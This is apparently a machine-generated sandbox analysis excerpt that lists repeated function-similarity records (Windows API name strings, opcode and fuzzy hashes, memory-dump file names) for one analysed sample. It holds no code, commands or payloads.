                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseFullGlobalMessageNamePathPeekPrivateProfileStringUnlock
                            • String ID:
                            • API String ID: 3404763234-0
                            • Opcode ID: 9cd3f22d3c6dc66cc047d7df66a14a2580822a26a3cc46f1d3918d67015479db
                            • Instruction ID: 55db884b1ec517b11f0bb6b5b56825d4ee5bb38a1dd10fc72c5cd0f4e8ab41a9
                            • Opcode Fuzzy Hash: 9cd3f22d3c6dc66cc047d7df66a14a2580822a26a3cc46f1d3918d67015479db
                            • Instruction Fuzzy Hash: 64816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C741
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: f0a76f5ad3ef98fa211b7ff92082da5ea2af6aeef1ad13f0413d93ca74929cb6
                            • Instruction ID: a93d2e1772e68bf1e6096105bf789f996495b749b206010035d773d0db8bace4
                            • Opcode Fuzzy Hash: f0a76f5ad3ef98fa211b7ff92082da5ea2af6aeef1ad13f0413d93ca74929cb6
                            • Instruction Fuzzy Hash: 4D816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalLengthMessagePeekTextUnlockWindow
                            • String ID:
                            • API String ID: 1215013059-0
                            • Opcode ID: 30585c8da64c7377c30960d6a69d8a1eb46f246b2ac77c483522f3caf1a3373a
                            • Instruction ID: 93afb9150833a3eabb7e22c4cce54f6ceb6bfb214cad87b1d1cd9fec1f7c2293
                            • Opcode Fuzzy Hash: 30585c8da64c7377c30960d6a69d8a1eb46f246b2ac77c483522f3caf1a3373a
                            • Instruction Fuzzy Hash: 95816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C741
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 3337cf6e4e750bf271e437af7c08d3d5a64fb82be24c0b5c00f760a07409464d
                            • Instruction ID: 1d812a0a90c98a5882d68d9aa1469116f00cdf094e899db973c60e69878b9b86
                            • Opcode Fuzzy Hash: 3337cf6e4e750bf271e437af7c08d3d5a64fb82be24c0b5c00f760a07409464d
                            • Instruction Fuzzy Hash: 4F816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C741
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalLabelMessagePeekUnlockVolumewcsncpy
                            • String ID:
                            • API String ID: 2345973108-0
                            • Opcode ID: 35c3db7763a7536dab53ab74aae8e6b4b2fad2429aa22e8e2c296034dfcfae7f
                            • Instruction ID: 95baae4879db8c814c9d477584ae9aa1afab0319b73cc5f2b62fd47fcb167512
                            • Opcode Fuzzy Hash: 35c3db7763a7536dab53ab74aae8e6b4b2fad2429aa22e8e2c296034dfcfae7f
                            • Instruction Fuzzy Hash: B3816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: fb524971182c1dbea17464b909c37f859fa1972cee5684d37c7009d3d2a3ca0b
                            • Instruction ID: 4c28536b201e24183907c39e974c69fb1e56e6690e32063ef363c9898c17d95f
                            • Opcode Fuzzy Hash: fb524971182c1dbea17464b909c37f859fa1972cee5684d37c7009d3d2a3ca0b
                            • Instruction Fuzzy Hash: F2816032205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseCurrentDirectoryGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1560712716-0
                            • Opcode ID: 4aa4cd62bfac42d1a1f67a3fe214f7ca6fb8632738361a7a56fe740b8f7394f1
                            • Instruction ID: d3d0cf119635325550aa4241e66643dadf1317f9e354750746eec3e7888ff88a
                            • Opcode Fuzzy Hash: 4aa4cd62bfac42d1a1f67a3fe214f7ca6fb8632738361a7a56fe740b8f7394f1
                            • Instruction Fuzzy Hash: 36816132205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 9d5f9f9344bef971890206682e69865a7d7303809403ca8888c23e8b1e8a40f2
                            • Instruction ID: 102e97ca0c5d9b4b66d2a11296ca9c543387f801879e5645785ddd1d183156b4
                            • Opcode Fuzzy Hash: 9d5f9f9344bef971890206682e69865a7d7303809403ca8888c23e8b1e8a40f2
                            • Instruction Fuzzy Hash: 2A816F32205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 8d2d6b9fafde3f62ae0fabd2d66e0574935de20bf33fe268cb5840578f4e7153
                            • Instruction ID: 5030e6f434a49efefc00005d16b931806ab9c945a75225f9e57cc1f70a92bf87
                            • Opcode Fuzzy Hash: 8d2d6b9fafde3f62ae0fabd2d66e0574935de20bf33fe268cb5840578f4e7153
                            • Instruction Fuzzy Hash: 31816032605B4086FB6B8B27E8947EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountInternetTick$CloseOpen$ClipboardGlobalHandleMessagePeekUnlock_wcstoi64
                            • String ID:
                            • API String ID: 2751744677-0
                            • Opcode ID: e9d4db7c2a4d82e4e30bad905e583d807efea66ab71ba6df386783e6308f6bbc
                            • Instruction ID: 2aa486ea33f44688c604cd3b2f2bc5ea79e0d1574d5518cc94ab16863299de38
                            • Opcode Fuzzy Hash: e9d4db7c2a4d82e4e30bad905e583d807efea66ab71ba6df386783e6308f6bbc
                            • Instruction Fuzzy Hash: 98816032205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 7c3f328a99d0f9b4a24c20f9fa0b9a82898a896a207ea1c00c779032fd978f7c
                            • Instruction ID: f383ee547f54974ed90ac125bc180d1b3ef58ba99e45c86da4e3c73056d56fb1
                            • Opcode Fuzzy Hash: 7c3f328a99d0f9b4a24c20f9fa0b9a82898a896a207ea1c00c779032fd978f7c
                            • Instruction Fuzzy Hash: 52816032605B4086FB6B8B27E8947EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 2fd33df8a997f30702df17981f7dcf720e067f730383cbf19267416cf604b6bf
                            • Instruction ID: 7129c1f4555cc177860dbafd43241bfd4a587454c8da467a10e2ac092c0e6632
                            • Opcode Fuzzy Hash: 2fd33df8a997f30702df17981f7dcf720e067f730383cbf19267416cf604b6bf
                            • Instruction Fuzzy Hash: D8816132605B4086FB6B8B27E8947EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 8075040a305b9c71f314a31140b9ec66ed8ada29f897aee9f2ef4985f6a070d1
                            • Instruction ID: b08b8e195a582a3ff087204705ad1813754dd0c0e348916cb183a17aa2bbfd39
                            • Opcode Fuzzy Hash: 8075040a305b9c71f314a31140b9ec66ed8ada29f897aee9f2ef4985f6a070d1
                            • Instruction Fuzzy Hash: 1F816132605B4086FB6B8B27E8947EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: a2de8008e752f5c80fb3df8286f67117f526f074e246764a63b7d779d5d728a7
                            • Instruction ID: 54fb18bf26b39885421204dba24ceb4986bb424dac2f4a11a96728c8481362ed
                            • Opcode Fuzzy Hash: a2de8008e752f5c80fb3df8286f67117f526f074e246764a63b7d779d5d728a7
                            • Instruction Fuzzy Hash: 62816032205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 84cb70e6e86b9754b1301ddfd44c1847e7b0b0c85e13957baf80daf0ca764aa9
                            • Instruction ID: 29c830a46f29f2777e35446dada89f0b8b57c43f91d414ab01ed8694eeef92b1
                            • Opcode Fuzzy Hash: 84cb70e6e86b9754b1301ddfd44c1847e7b0b0c85e13957baf80daf0ca764aa9
                            • Instruction Fuzzy Hash: E2817032205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: f20a3e796b116e6c426edeb68987f92bad814daee9941f24fdc34d575a7fe8b9
                            • Instruction ID: a3c56084c60be7e11c0a74e6b293fa20270d1c656f6b1d5c40e48e309bbabdc2
                            • Opcode Fuzzy Hash: f20a3e796b116e6c426edeb68987f92bad814daee9941f24fdc34d575a7fe8b9
                            • Instruction Fuzzy Hash: 9E816032205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$Message$ClipboardCloseGlobalPeekSendTimeoutUnlock
                            • String ID:
                            • API String ID: 3716859204-0
                            • Opcode ID: a6b751bacad486a0994e6a59dfb99e17fab394ef109b7a01831a033d68a10d29
                            • Instruction ID: 68294c8fc13dca0e25737d313e304220828d126790a50964a33af6f1561235e0
                            • Opcode Fuzzy Hash: a6b751bacad486a0994e6a59dfb99e17fab394ef109b7a01831a033d68a10d29
                            • Instruction Fuzzy Hash: F7816132205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
